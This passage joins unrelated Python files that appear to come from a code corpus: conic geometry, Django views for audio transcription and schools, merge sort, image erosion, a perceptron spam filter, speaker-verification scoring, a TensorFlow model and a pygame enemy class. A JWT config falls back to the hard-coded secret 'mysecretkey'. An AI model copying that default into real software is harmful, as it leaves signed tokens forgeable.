        # Scaled radius of curvature: Rc/r0
        self.A = A

    def make_t_array(self, limits=None, N=2001):
        """Return an array of `N` equal-spaced t-parameter values between `limits`"""
        if limits is None:
            limits = self.tlimits_h if self.hyper or self.parab else self.tlimits_e
        return np.linspace(limits[0], limits[1], N)

    def x(self, t):
        """Body-frame x-position wrt star"""
        fac = 1.0 - np.cosh(t) if self.hyper else np.cos(t) - 1.0
        out = -0.5*self.A*t**2 + 1 if self.parab else 1.0 + self.A*fac/self.b_a**2
        return out

    def y(self, t):
        """Body-frame y-position wrt star"""
        fac = np.sinh(t) if self.hyper else np.sin(t)
        out = self.A*t if self.parab else self.A*fac/self.b_a
        return out

    def theta(self, t):
        """Body-frame angle from x-axis in degrees"""
        return np.degrees(np.arctan2(self.y(t), self.x(t)))

    def xt(self, inc, t):
        """Observer-frame x'-position of tangent line"""
        fac1 = 1.0 - np.cosh(t) if self.hyper else np.cos(t) - 1.0
        fac2 = np.cosh(t) if self.hyper else np.cos(t)
        cosi = np.cos(np.radians(inc))
        tani = np.tan(np.radians(inc))
        if self.parab:
            # BUG FIX: was `self.xtpar(self, inc, t)`, which passed `self`
            # twice and raised TypeError for every parabolic conic
            out = self.xtpar(inc, t)
        else:
            out = cosi*(1.0 + self.A*(fac1/self.b_a**2 + fac2*tani**2))
        return out

    def xtpar(self, inc, t):
        """Observer-frame x'-position of parabola tangent line"""
        cosi = np.cos(np.radians(inc))
        sini = np.sin(np.radians(inc))
        tani = np.tan(np.radians(inc))
        fac = 0.5*self.A*t**2 + 1
        return fac*cosi - self.A*sini*tani

    def ytpar(self, inc, t):
        """Observer-frame y'-position of parabola tangent line"""
        tani = np.tan(np.radians(inc))
        return self.A*t*np.sqrt(1 - (tani/t)**2)

    def yt(self, inc, t):
        """Observer-frame y'-position of tangent line"""
        st = np.sinh(t) if self.hyper else np.sin(t)
        ct = np.cosh(t) if self.hyper else np.cos(t)
        tani = np.tan(np.radians(inc))
        if self.parab:
            # BUG FIX: was `self.ytpar(self, inc, t)` — same double-self bug
            out = self.ytpar(inc, t)
        else:
            out = np.sign(t)*(self.A/self.b_a)*np.sqrt(st**2 - (self.b_a*tani*ct)**2)
        return out

    def theta_t(self, inc, t):
        """Observer-frame angle of tangent line from x'-axis in degrees"""
        return np.degrees(np.arctan2(self.yt(inc, t), self.xt(inc, t)))

    def tparallel(self, inc):
        """Minimum value of t on the tangent line as function of inclination

        Corresponds to y'=0"""
        at = np.arctanh if self.hyper else np.arctan
        tani = np.tan(np.radians(inc))
        if self.parab:
            out = tani
        else:
            out = at(self.b_a*tani)
        return out

    def g(self, inc):
        """q'/q = (R_0'/D') / (R_0/D) """
        return 1.0 + self.sign * self.A * (self.f(inc) - 1.0)/self.b_a**2

    def f(self, inc):
        # projection factor common to g() and Aprime()
        return np.sqrt(1.0 + self.sign * self.b_a**2 * np.tan(np.radians(inc))**2)

    def Aprime(self, inc):
        """Apparent radius of curvature parameter at inclination `inc`"""
        return self.A/(np.cos(np.radians(inc))**2 * self.f(inc) * self.g(inc))
if __name__ == "__main__":
    # placeholder smoke entry point — no plotting implemented yet
    # TODO Test the mechanism by drawing some conics
    print("Write some tests!")
|
# In views.py
# Requires ---> from pydub import AudioSegment
# The voice-recognition converter can work together with another converter (the audio-format converter).
@login_required()  # a user can only convert a file if they are logged in
def fileupload(request):
    # Handle an audio upload: optionally transcode mp3 -> wav, run the
    # speech-to-text conversion, and store both the transcript file and the
    # transcript text on the FileInfo record.
    if request.method == 'POST':
        form = FileInfoForm(request.POST, request.FILES)
        if form.is_valid():
            fileinfo = form.save(commit=False)
            fileinfo.user = request.user
            name, ext = os.path.splitext(request.FILES['audio_file'].name)
            if ext == '.mp3':
                # mp3 input: dump the upload to a temp file so pydub can decode it
                with tempfile.NamedTemporaryFile(delete=False) as tf:
                    tf.write(request.FILES['audio_file'].read())
                    tf.seek(0)
                    sound = AudioSegment.from_mp3(tf.name)
                # export as wav and replace the stored audio file with it
                with tempfile.NamedTemporaryFile(delete=False) as wavfile:
                    sound.export(wavfile.name, format="wav")
                    fileinfo.audio_file = FileSystemStorage().save(
                        'audios/%s.wav' % splitext(basename(fileinfo.audio_file.name))[0], wavfile)
                    file = BytesIO(fileinfo.audio_file.read())  # NOTE: shadows builtin `file` name pattern
            else:
                # already wav (or other supported format): feed the raw upload
                file = BytesIO(request.FILES['audio_file'].read())
            # getting the converted text
            text_converted = convert_audio(file)
            # saving the converted text (kept in memory) as the text_file
            with StringIO() as t:
                t.write(text_converted)
                # NOTE(review): `t` is not rewound (t.seek(0)) before save —
                # the stored transcript file may end up empty; verify
                fileinfo.text_file = FileSystemStorage().save(
                    'texts/%s.txt' % splitext(basename(fileinfo.audio_file.name))[0], t)
            fileinfo.text_data = text_converted
            fileinfo.save()
            return redirect(reverse('filelist'))
    else:
        form = FileInfoForm()
    return render(request, 'polls/upload.html', {'form': form})
import datetime
@login_required()
def filedownload(request, pk):
    """Serve the stored transcript of the user's own FileInfo as a download."""
    # 404 unless the record exists AND belongs to the requesting user
    fileinfo = get_object_or_404(FileInfo, pk=pk, user=request.user)
    content = fileinfo.text_file.read()
    response = HttpResponse(content, content_type='application/text')
    filename = basename(fileinfo.text_file.name)
    response['Content-Disposition'] = 'attachment; filename=' + filename
    return response
|
import os
# JWT signing configuration; the key is taken from the JWT_KEY environment
# variable with a development fallback.
# NOTE(review): do not ship the 'mysecretkey' default to production.
JwtConfig = {
    'key': os.environ.get('JWT_KEY', 'mysecretkey')
}
|
# For Python 3.5+ use math.inf; for lower versions use float("inf").
# If you don't want to use infinity as a sentinel, just find the largest element in the array and add one to it.
def mSort(A):
    """Return a sorted copy of A using top-down merge sort."""
    if len(A) <= 1:
        # empty or single-element lists are already sorted
        return A
    mid = (len(A) - 1) // 2
    left_sorted = mSort(A[:mid + 1])
    right_sorted = mSort(A[mid + 1:])
    return merge(left_sorted, right_sorted)
def merge(L, R):
    """Merge two sorted lists into one sorted list.

    Improvements over the sentinel-based version: the inputs are no longer
    mutated (no float("inf") appended), and the merge works for any mutually
    comparable elements — including strings and lists that themselves contain
    float("inf") — not just finite numbers.
    """
    result = []
    i = j = 0
    while i < len(L) and j < len(R):
        if L[i] <= R[j]:
            result.append(L[i])
            i += 1
        else:
            result.append(R[j])
            j += 1
    # one of the two is exhausted; append the remainder of the other
    result.extend(L[i:])
    result.extend(R[j:])
    return result
from django.shortcuts import render
from django.urls import reverse_lazy
from django.views.generic import (View,TemplateView,
ListView,DetailView,
CreateView,UpdateView,
DeleteView)
from . import models
# Pretty simple right?
class IndexView(TemplateView):
    """Render the static landing page."""
    # TemplateView only needs the template path (relative to the template dirs)
    template_name = 'index.html'
class SchoolListView(ListView):
    """List all School objects; exposed to the template as `schools`."""
    context_object_name = 'schools'  # default would be `school_list`
    model = models.School
class SchoolDetailView(DetailView):
    """Display one School; exposed to the template as `school_details`."""
    # FIX: removed stray debug `print('inside detail view')` that lived in the
    # class body and executed once at import time, not per request
    context_object_name = 'school_details'
    model = models.School
    template_name = 'basic_app/school_detail.html'
class SchoolDeleteView(DeleteView):
    """Delete a School, then redirect to the school list."""
    model = models.School
    success_url = reverse_lazy("basic_app:list")  # lazy: URLconf not loaded yet at import
class SchoolCreateView(CreateView):
    """Create a School from a generated form with these editable fields."""
    fields = ('name', 'principal', 'location')
    model = models.School
class SchoolUpdateView(UpdateView):
    """Edit an existing School (location intentionally not editable here)."""
    fields = ('name', 'principal')
    model = models.School
|
# coding: utf-8
# In[1]:
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import math
# In[2]:
def define_mask():
    """Build, print and return the 3x3 all-ones structuring element for erosion."""
    mask = [[1, 1, 1] for _ in range(3)]
    for row in mask:
        # each value followed by a space, one row per line (matches the
        # original element-by-element printing)
        print("".join("{} ".format(v) for v in row))
    return mask
# In[16]:
def my_erosion(img, mask):
    """Binary erosion of 2-D image `img` by a 3x3 `mask`.

    A pixel survives only if every pixel of its 3x3 neighbourhood is truthy
    and the corresponding mask entry is truthy.  Border pixels are left 0.
    """
    rows, cols = img.shape[0], img.shape[1]
    eroded = np.zeros((rows, cols))
    # neighbourhood offsets in row-major order, matching mask indexing
    offsets = [(di, dj) for di in (-1, 0, 1) for dj in (-1, 0, 1)]
    for i in range(1, rows - 1):
        for j in range(1, cols - 1):
            # fold with `and` to reproduce the original truthiness chain
            hit = True
            for di, dj in offsets:
                hit = hit and (img[i + di, j + dj] and mask[di + 1][dj + 1])
            eroded[i, j] = hit
    return eroded
# In[17]:
# 3x3 structuring element (also printed by define_mask as a side effect)
mask = define_mask()
# In[18]:
def get_distance(v, w=(1/3, 1/3, 1/3)):
    """Return the weighted Euclidean norm of the 3-vector v.

    Computes sqrt(v0^2*w0 + v1^2*w1 + v2^2*w2).  With the default equal
    weights this is used as an RGB -> gray intensity.

    Fixes: removed the unused locals (w1, w2, w3) and replaced the mutable
    list default argument with a tuple (backward compatible — w is only
    indexed, never mutated).
    """
    return (v[0] ** 2 * w[0] + v[1] ** 2 * w[1] + v[2] ** 2 * w[2]) ** .5
# In[19]:
def convert_rgb_to_gray_level(img):
    """Collapse an (m, n, 3) RGB image to an (m, n) gray image by applying
    get_distance to every pixel's channel vector."""
    rows, cols = img.shape[0], img.shape[1]
    gray = np.zeros((rows, cols))
    for r in range(rows):
        for c in range(cols):
            gray[r, c] = get_distance(img[r, c, :])
    return gray
# In[20]:
def convert_gray_level_to_BW(img):
    """Threshold a gray-level image at 120: values > 120 become 1.0, else 0.0.

    Vectorized form of the per-pixel loop; returns a float array like the
    original np.zeros-based implementation.
    """
    return (img > 120).astype(float)
# In[21]:
# Notebook driver: load the test image and run the pipeline
# RGB -> gray -> binary -> two successive erosions, displaying each stage.
img = mpimg.imread("turtle.jpg")
get_ipython().run_line_magic('matplotlib', 'inline')  # Jupyter-only magic
img_2 = convert_rgb_to_gray_level(img)
img_3 = convert_gray_level_to_BW(img_2)
img_4 = my_erosion(img_3, define_mask())
img_5 = my_erosion(img_4, define_mask())
plt.imshow(img_3, cmap="gray"), plt.show()
plt.imshow(img_4, cmap="gray"), plt.show()
plt.imshow(img_5, cmap="gray"), plt.show()
|
import os
import re
import math
import sys
import copy
from fnmatch import fnmatch
# Global state for the perceptron spam classifier (NOTE: Python 2 script).
pattern = "*.txt"        # which files in the corpus directories to read
word_list = []           # every token seen across the training corpus
spam = 1                 # class label for spam
ham = 0                  # class label for ham
dict_spam = {}           # filename -> list of words(word, count) records (spam docs)
dict_ham = {}            # filename -> list of words(word, count) records (ham docs)
lw = []                  # list of Vocabulary(word, weight) records
pre = {}                 # filename -> prediction from the current weights
listwords = {}           # word -> current perceptron weight
lrate = 0.5              # learning rate
iterations = 3           # number of training passes
lambda_value = sys.argv[1]   # L2 regularization strength (CLI argument 1)
cwd = os.getcwd()
with open('stopwords.txt') as f:
    stop_words = f.read().splitlines()
def get_words(x, y):
    """Tokenize every line of iterable x into lowercase word pieces and
    extend list y with them (splitting on non-word characters and '_')."""
    for line in x:
        for token in line.split():
            pieces = re.split(r'\W+|_', token.lower())
            # drop the empty strings that re.split produces at boundaries
            y += [p for p in pieces if p]
def word_frequency(doc, list, ws):
    """Append a words(term, count) record to `list` for every distinct term
    in token list `ws`, in sorted term order.  (`doc` is accepted but unused.)"""
    for term in sorted(set(ws)):
        list.append(words(term, ws.count(term)))
def extractwords(dir, dict):
    # Walk `dir`, tokenize every file matching `pattern` (*.txt), optionally
    # strip stop words (when sys.argv[2] == 'yes'), and record the per-file
    # word-count records in `dict` (filename -> list of words objects).
    # Also extends the global word_list with all tokens.
    os.chdir(cwd)
    global word_list
    for path, subdirs, files in os.walk(dir):
        os.chdir(dir)  # NOTE(review): chdir inside the walk is fragile for nested dirs
        for name in files:
            words_obj = []
            words = []
            if fnmatch(name, pattern):
                with open(name, 'r') as file:
                    get_words(file, words)
                if (sys.argv[2] == 'yes'):
                    # remove stop words; iterate over a copy while mutating
                    filtered_word_list = words[:]
                    for word in words:
                        if word in stop_words:
                            filtered_word_list.remove(word)
                    words = filtered_word_list
                word_frequency(file, words_obj, words)
                word_list = word_list + words
                dict[name] = words_obj
class Vocabulary(object):
    # Record pairing a vocabulary word with its learned perceptron weight.
    def __init__(self, word, weight):
        self.word = word
        self.weight = weight
class words(object):
    # Record pairing a word with its occurrence count within one document.
    # (Lower-case class name kept — existing callers depend on it.)
    def __init__(self, word, count):
        self.word = word
        self.count = count
# Build the vocabulary from both training classes (Python 2 print syntax).
extractwords('train/spam', dict_spam)
extractwords('train/ham', dict_ham)
V = sorted(set(word_list))  # sorted vocabulary over spam + ham
print len(V)
def initialize_weights(V):
    # Zero-initialize every vocabulary word's weight, both in the global
    # `lw` record list and the `listwords` dict (the dict is what training uses).
    for i in V:
        lw.append(Vocabulary(i, 0))
        listwords[i] = 0

initialize_weights(V)
def match(words):
    """Return the learned weight for token `words` from the global `lw`
    records, or 0 when the token is unknown."""
    for entry in lw:
        if entry.word == words:
            return entry.weight
    return 0
def match_fn(word, ls):
    """Return the stored count of `word` within record list `ls` (objects
    with .word/.count attributes), or 0 when not present."""
    for record in ls:
        if record.word == word:
            return record.count
    return 0
def predict(list):
    # Perceptron activation during training: bias of 1 plus weighted word
    # counts; returns 1 (spam) when positive, else 0 (ham).
    sum = 1  # bias term; NOTE: shadows the builtin `sum`
    for i in range(len(list)):
        sum = sum + list[i].count * listwords[list[i].word]
    if sum > 0:
        return 1
    else:
        return 0
# calculates pre[key] for every document in the given class dict
def prediction(dict, val):
    # Store the current model's prediction for each document in the global `pre`.
    # NOTE(review): the `val` parameter (expected label) is unused.
    for key in dict.keys():
        ls = dict[key]
        pr = predict(ls)
        pre[key] = pr
def initialize_array():
    """Return a fresh dict mapping every vocabulary word (global V) to 0."""
    return {word: 0 for word in V}
def dw_calculation():
    # Gradient of the unregularized perceptron criterion:
    # dw[word] = sum over training docs of count(word, doc) * (true_label - predicted_label)
    dw = initialize_array()
    for i in dw.keys():
        for j in dict_spam.keys():
            ls = dict_spam[j]
            frequency = match_fn(i, ls)
            prev = dw[i]
            dw[i] = prev + frequency * (spam - pre[j])
        for j in dict_ham.keys():
            ls = dict_ham[j]
            frequency = match_fn(i, ls)
            prev = dw[i]
            dw[i] = prev + frequency * (ham - pre[j])
    return dw
def update_weights(dw, ls):
    # L2-regularized gradient step: w <- w + lrate * (dw - lambda * w)
    for key in ls.keys():
        val = ls[key] + float(lrate) * (float(dw[key]) - (float(lambda_value) * float(ls[key])))
        ls[key] = val
# Training loop: predict with current weights, compute the gradient, update.
for i in range(iterations):
    prediction(dict_spam, spam)
    prediction(dict_ham, ham)
    dweights = dw_calculation()
    update_weights(dweights, listwords)
def classify(list):
    # Score a test document with the learned weights; unlike predict() there
    # is no bias term and unknown words are skipped.
    sum = 0  # NOTE: shadows the builtin `sum`
    for i in range(len(list)):
        if list[i].word in listwords:
            sum += list[i].count * listwords[list[i].word]
    if sum > 0:
        return 1
    else:
        return 0
def apply_p_helper(dict, exp):
    # Increment the global `count` for every document whose classification
    # matches the expected label `exp`.
    global count
    for key in dict.keys():
        ls = dict[key]
        prediction = classify(ls)  # NOTE: local name shadows the prediction() function
        if prediction == exp:
            count = count + 1

count = 0  # global tally of correctly classified test documents
def apply_p():
    # Evaluate classification accuracy on the held-out test set
    # (Python 2 print statements).
    print "applying...."
    test_spam = {}
    test_ham = {}
    os.chdir(cwd)
    extractwords('test/spam', test_spam)
    extractwords('test/ham', test_ham)
    apply_p_helper(test_spam, spam)
    apply_p_helper(test_ham, ham)
    total_docs = len(test_spam) + len(test_ham)
    accuracy = float(count) / float(total_docs) * 100
    print "Accuracy ", accuracy

apply_p()
# master branch modification test
import xml.etree.ElementTree as ET
import sqlite3
# Open (or create) the track database and get a cursor.
conn = sqlite3.connect('trackdb.sqlite')
cur = conn.cursor()

# Recreate the three tables from scratch using executescript()
# (drops any previous contents).
# NOTE(review): Album.album_id looks like it should be artist_id —
# confirm against the code that populates these tables.
cur.executescript('''
DROP TABLE IF EXISTS Artist;
DROP TABLE IF EXISTS Album;
DROP TABLE IF EXISTS Track;
CREATE TABLE Artist (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
name TEXT UNIQUE
);
CREATE TABLE Album (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
album_id INTEGER,
title TEXT UNIQUE
);
CREATE TABLE Track (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
title TEXT UNIQUE,
album_id INTEGER,
len INTEGER, rating INTEGER, count INTEGER
);
''')
#
|
import glob
import os
import numpy as np
import scipy
import torchaudio
from speechbrain.pretrained import EncoderClassifier
from tqdm import tqdm
from sklearn.metrics import roc_curve
from scipy.optimize import brentq
from scipy.interpolate import interp1d
from matplotlib import pyplot as plt
import argparse
# Speaker IDs — each must match a sub-directory name of the evaluation data set.
SPEAKERS = ['S0767', 'S0901', 'S0903', 'S0905', 'S0916']

if __name__ == '__main__':
    # Speaker-verification evaluation: compute pairwise cosine scores between
    # ECAPA-TDNN embeddings, report the EER without score normalization, then
    # the EER with s-norm for successively halved normalization-set sizes.
    # NOTE(review): paths use Windows separators ('\\') throughout.
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--path_to_data',
        type=str,
        default='.\\TestTaskData\\data',
        help='Path to data to perform evaluation on.'
    )
    parser.add_argument(
        '--path_to_norm_set',
        type=str,
        default='.\\TestTaskData\\normalization_set.',
        help='Path to normalization set')
    parser.add_argument(
        '--path_to_embeddings',
        type=str,
        default='.\\embeddings.npy',
        help='Path to embeddings of the evaluation data set.')
    parser.add_argument(
        '--path_to_norm_set_embeddings',
        type=str,
        default='.\\norm_set_embeddings.npy',
        help='Path to normalization set embeddings.')
    parser.add_argument(
        '--path_to_onehot_classes',
        type=str,
        default='.\\onehot_classes.npy',
        help='Path to onehot classes of the evaluation set.')
    args = parser.parse_args()
    # classifier is loaded lazily — only when embeddings must be computed
    classifier = None
    # get evaluation set embeddings (cached on disk between runs)
    print("Extracting evaluation set embeddings...")
    if os.path.exists(args.path_to_embeddings):
        embeddings = np.load(args.path_to_embeddings, allow_pickle=True)
        onehot_classes = np.load(args.path_to_onehot_classes, allow_pickle=True)
    else:
        # evaluation set utterance paths (layout: data\<speaker>\<utterance>)
        utterances = glob.glob(f'{args.path_to_data}\\*\\*')
        # get Speechbrain classifier
        classifier = EncoderClassifier.from_hparams(source="speechbrain/spkrec-ecapa-voxceleb")
        # compute evaluation set embeddings and L2-normalize each of them
        onehot_classes = None
        onehots = np.identity(len(SPEAKERS))
        for utterance in tqdm(utterances):
            signal, fs = torchaudio.load(utterance)
            embedding = classifier.encode_batch(signal)
            utterance_speaker = utterance.split('\\')[-2]  # speaker = parent dir name
            _class = SPEAKERS.index(utterance_speaker)
            if onehot_classes is None:
                # first utterance initializes both accumulators
                onehot_classes = np.expand_dims(onehots[_class], 0)
                embeddings = embedding[0] / np.linalg.norm(embedding[0])
            else:
                onehot_classes = np.concatenate([onehot_classes, np.expand_dims(onehots[_class], 0)], axis=0)
                embeddings = np.concatenate([embeddings, embedding[0] / np.linalg.norm(embedding[0])], axis=0)
        # save embeddings and one-hot classes as npy
        np.save(args.path_to_embeddings, embeddings)
        np.save(args.path_to_onehot_classes, onehot_classes)
    # labels and scores for all unique pairs of evaluation embeddings;
    # with unit-norm embeddings the dot product is the cosine similarity
    label_matrix = onehot_classes @ np.transpose(onehot_classes)
    score_matrix = embeddings @ np.transpose(embeddings)
    indices = np.triu_indices(label_matrix.shape[0], 1)  # unique pairs, no self-pairs
    labels = label_matrix[indices]
    scores = score_matrix[indices]
    # EER: the ROC point where the false-positive rate equals 1 - TPR
    fpr, tpr, thrs = roc_curve(labels, scores)
    eer = brentq(lambda x: 1. - x - interp1d(fpr, tpr)(x), 0., 1.)
    print(f'EER for evaluation set without normalization: {eer}')
    # get normalization set embeddings (also cached on disk)
    print("Extracting normalization set embeddings...")
    if os.path.exists(args.path_to_norm_set_embeddings):
        embeddings_norm_set = np.load(args.path_to_norm_set_embeddings, allow_pickle=True)
    else:
        # get normalization set utterance paths
        utterances_norm_set = glob.glob(f'{args.path_to_norm_set}\\*')
        # get Speechbrain classifier (unless already loaded above)
        if classifier is None:
            classifier = EncoderClassifier.from_hparams(source="speechbrain/spkrec-ecapa-voxceleb")
        # compute normalization set embeddings and L2-normalize each of them
        embeddings_norm_set = None
        for utterance in tqdm(utterances_norm_set):
            signal, fs = torchaudio.load(utterance)
            embedding = classifier.encode_batch(signal)
            utterance_speaker = utterance.split('\\')[-2]  # NOTE(review): unused here
            if embeddings_norm_set is None:
                embeddings_norm_set = embedding[0] / np.linalg.norm(embedding[0])
            else:
                embeddings_norm_set = np.concatenate([embeddings_norm_set, embedding[0] / np.linalg.norm(embedding[0])], axis=0)
        # save normalization set embeddings as npy
        np.save(args.path_to_norm_set_embeddings, embeddings_norm_set)
    # EER with s-normalization for normalization-set sizes halved down to 2
    eers_norm = []
    lens_norm_set = []
    len_norm_set = embeddings_norm_set.shape[0]
    while len_norm_set != 1:
        print(f'Doing normalization set size {len_norm_set}')
        # cosine similarity between evaluation and normalization embeddings
        embeddings_norm_set = embeddings_norm_set[:len_norm_set]
        score_matrix_for_norm = embeddings @ np.transpose(embeddings_norm_set)
        # per-utterance mean and std over the normalization-set axis
        means_for_norm = np.mean(score_matrix_for_norm, axis=1)
        stds_for_norm = np.std(score_matrix_for_norm, axis=1)
        # s-norm score: average of the two z-normalized scores of each pair
        means_x = means_for_norm[indices[0]]
        means_y = means_for_norm[indices[1]]
        stds_x = stds_for_norm[indices[0]]
        stds_y = stds_for_norm[indices[1]]
        scores_norm = 1/2*((scores - means_x)/stds_x + (scores - means_y)/stds_y)
        # compute EER on the normalized scores
        fpr_norm, tpr_norm, thrs_norm = roc_curve(labels, scores_norm)
        eer_norm = brentq(lambda x: 1. - x - interp1d(fpr_norm, tpr_norm)(x), 0., 1.)
        eers_norm.append(eer_norm)
        lens_norm_set.append(len_norm_set)
        len_norm_set //= 2
    print(f"EER's: {eers_norm}")
    print(f"Norm set sizes: {lens_norm_set}")
    # plot EER vs. normalization-set size against the unnormalized baseline
    plt.plot(lens_norm_set, eers_norm, marker='o', color='purple')
    plt.plot([0, 160], [eer, eer], '--', color='red')
    plt.xlabel('Length of norm set')
    plt.ylabel('EER')
    plt.legend(['with norm set', 'without norm set'])
    plt.grid()
    plt.savefig(f'eer_on_norm_set_length.png')
|
import tensorflow as tf
import pandas as pd
import numpy as np
from sample_generator import sampleGenerator
# CSV locations for the two input feature streams and the target labels
pse_data_loc = 'data/pse_data.csv'
wb_data_loc = 'data/wb_data.csv'
labels_loc = 'data/output_data.csv'
def calc_inference(pse_data, wb_data):
    # Build the TF1 inference graph: one conv layer per input stream, the two
    # flattened feature maps concatenated, then three fully connected layers
    # producing 206 logits (one per output label).
    pse_data = tf.reshape(pse_data, [-1, 90, 412, 1])
    wb_data = tf.reshape(wb_data, [-1, 5, 624, 1])
    with tf.name_scope('pse_conv'):
        # 90x1 filters collapse the 90-row axis into 5 feature maps
        W = tf.Variable(tf.truncated_normal([90, 1, 1, 5], stddev=0.05))
        b = tf.Variable(tf.constant(0.05, shape=[5]))
        pse_h = tf.nn.relu(tf.nn.conv2d(pse_data, filter=W, strides=[1, 1, 1, 1], padding='VALID') + b)
    with tf.name_scope('wb_conv'):
        # 5x1 filters collapse the 5-row axis into 3 feature maps
        W = tf.Variable(tf.truncated_normal([5, 1, 1, 3], stddev=0.05))
        b = tf.Variable(tf.constant(0.05, shape=[3]))
        wb_h = tf.nn.relu(tf.nn.conv2d(wb_data, filter=W, strides=[1, 1, 1, 1], padding='VALID') + b)
    with tf.name_scope('fc1'):
        num_pse = 412 * 5
        num_wb = 624 * 3
        W = tf.Variable(tf.truncated_normal([num_pse + num_wb, num_pse + num_wb], stddev=0.05))
        b = tf.Variable(tf.constant(0.05, shape=[num_pse + num_wb]))
        pse_flat = tf.reshape(pse_h, [-1, num_pse])
        wb_flat = tf.reshape(wb_h, [-1, num_wb])
        features = tf.concat([pse_flat, wb_flat], axis=1)
        h1 = tf.nn.relu(tf.matmul(features, W) + b)
    with tf.name_scope('fc2'):
        W = tf.Variable(tf.truncated_normal([num_pse + num_wb, num_pse + num_wb], stddev=0.05))
        b = tf.Variable(tf.constant(0.05, shape=[num_pse + num_wb]))
        h2 = tf.nn.relu(tf.matmul(h1, W) + b)
    with tf.name_scope('fc3'):
        # final linear layer: raw logits, no activation (loss applies sigmoid)
        W = tf.Variable(tf.truncated_normal([num_pse + num_wb, 206], stddev=0.05))
        b = tf.Variable(tf.constant(0.05, shape=[206]))
        logits = tf.matmul(h2, W) + b
    return logits
def calc_loss(logits, labels):
    """Mean element-wise sigmoid cross-entropy between logits and multi-hot labels."""
    per_element = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits)
    return tf.reduce_mean(per_element)
def calc_training(loss, learning_rate):
    # Plain SGD minimization op for the given loss tensor.
    optimizer = tf.train.GradientDescentOptimizer(learning_rate)
    train_op = optimizer.minimize(loss)
    return train_op
def calc_accuracy(logits, labels):
    # Precision of the positive predictions:
    # (# predicted-positive that are actually positive) / (# predicted-positive).
    y = tf.sigmoid(logits)
    correct = tf.multiply(y, labels)
    total = tf.reduce_sum(tf.round(y))
    accuracy = tf.reduce_sum(tf.round(correct))
    # NOTE(review): divides by the predicted-positive count — NaN when the
    # model predicts no positives at all
    return accuracy / total
def calc_total(logits):
    """Count predicted positives: sigmoid outputs that round to 1."""
    return tf.reduce_sum(tf.round(tf.sigmoid(logits)))
def main():
    # Train the two-stream network on batches of 10 samples for 10000 steps,
    # restoring from the latest checkpoint and reporting every 100 steps.
    sample = sampleGenerator(pse_data_loc, wb_data_loc, labels_loc)
    X_pse = tf.placeholder(tf.float32, [None, 90, 412])
    X_wb = tf.placeholder(tf.float32, [None, 5, 624])
    Y = tf.placeholder(tf.float32, [None, 206])
    logits = calc_inference(X_pse, X_wb)
    loss = calc_loss(logits, Y)
    train_op = calc_training(loss, 0.05)
    accuracy = calc_accuracy(logits, Y)
    total = calc_total(logits)
    init = tf.global_variables_initializer()  # NOTE(review): unused while restoring from checkpoint
    saver = tf.train.Saver()
    with tf.Session() as sess:
        summary_writer = tf.summary.FileWriter('log', sess.graph)
        saver.restore(sess, tf.train.latest_checkpoint('save'))
        #sess.run(init)  # enable instead of restore() when training from scratch
        for i in range(10000):
            pse_samples, wb_samples, labels_samples = sample.retrieve_sample(10)
            _, curr_loss = sess.run([train_op, loss], feed_dict={X_pse: pse_samples, X_wb: wb_samples, Y: labels_samples})
            if (i+1) % 100 == 0:
                # metrics are evaluated on the current *training* batch
                curr_accuracy = accuracy.eval(feed_dict={X_pse: pse_samples, X_wb: wb_samples, Y: labels_samples})
                total_trade = total.eval(feed_dict={X_pse: pse_samples, X_wb: wb_samples, Y: labels_samples})
                print("Step %d, training accuracy %g" % (i+1, curr_accuracy))
                print("Step %d, training loss %g" % (i+1, curr_loss))
                print("Step %d, total recommendations %g" % (i+1, total_trade))
                saver.save(sess, 'save/model.ckpt')

if __name__ == '__main__':
    main()
|
import math, random
import pygame as pg
from pygame.sprite import *
from player import Bullet
from utils import DamageBar, random_pos, media_path
# Fully transparent RGBA color used to clear freshly created sprite surfaces.
TRANSPARENT = (0, 0, 0, 0)
class EnemySpawner:
    """Spawns Enemy sprites on a timer and tracks how many have been killed."""

    def __init__(self):
        self.time = 0
        self.spawn_interval = 250
        self.enemies = Group()
        self.enemies_killed = 0
        self.spawn_sound = pg.mixer.Sound(media_path('spawn.wav'))

    def spawn(self, player_pos):
        """Create one 50x50 enemy at a random position offset from the player."""
        self.spawn_sound.play()
        offset = 100
        spawn_point = random_pos(player_pos, offset)
        self.enemies.add(Enemy(spawn_point, (50, 50)))

    def update(self, dt, player_pos):
        """Advance the timer, spawn on schedule, and cull enemies flagged as killed."""
        # First spawn at tick 50, then one every spawn_interval ticks past 100.
        first_due = self.time == 50
        interval_due = self.time > 100 and self.time % self.spawn_interval == 0
        if first_due or interval_due:
            self.spawn(player_pos)
        self.time += 1
        self.enemies.update(dt, player_pos)
        for enemy in self.enemies.sprites():
            if not enemy.killed:
                continue
            self.enemies_killed += 1
            enemy.kill()
class Enemy(Sprite):
    """Enemy sprite: patrols random waypoints, then chases and shoots the player."""
    def __init__(self, pos, size):
        Sprite.__init__(self)
        self.size = size
        self.original_img = self.make_image(self.size, pg.Color('green'))
        self.image = self.original_img.copy()
        self.rect = self.image.get_rect(center=pos)
        # Float position kept separately so sub-pixel movement accumulates.
        self.true_pos = list(self.rect.center)
        self.speed = 100
        self.max_health = 100
        self.health = 100
        self.killed = False
        self.damage_bar = DamageBar(self.rect.topleft, (50, 10), pg.Color('red'))
        # Patrol variables
        self.patrol_radius = 200
        self.patrol_points = []
        self.current_patrol = 0
        # Bullet variables
        self.bullets = Group()
        self.bullet_interval = 50
        self.bullet_time = 0
        self.shoot = pg.mixer.Sound(media_path('enemy_gunshot.wav'))
    def make_image(self, size, player_color):
        """Draw the enemy body (barrel + two ellipses) onto a transparent surface."""
        img = pg.Surface(size).convert_alpha()
        img.fill(TRANSPARENT)
        rect = img.get_rect()
        center = rect.center
        pg.draw.rect(img, pg.Color('black'), [center[0] - 5, 40, 10, 40])
        pg.draw.ellipse(img, pg.Color('black'), rect.inflate(-10, -10))
        pg.draw.ellipse(img, player_color, rect.inflate(-20, -20))
        return img
    def update(self, dt, player_pos):
        # Create enemy behaviour
        # 1. Patrol - enemy moves through random points (green body)
        # 2. Chase and attack - enemy follows player around and shoots (red body)
        # If the enemy is more than patrol_radius units away from player
        # do patrol
        dist_vec = pg.math.Vector2(self.rect.center) - pg.math.Vector2(player_pos)
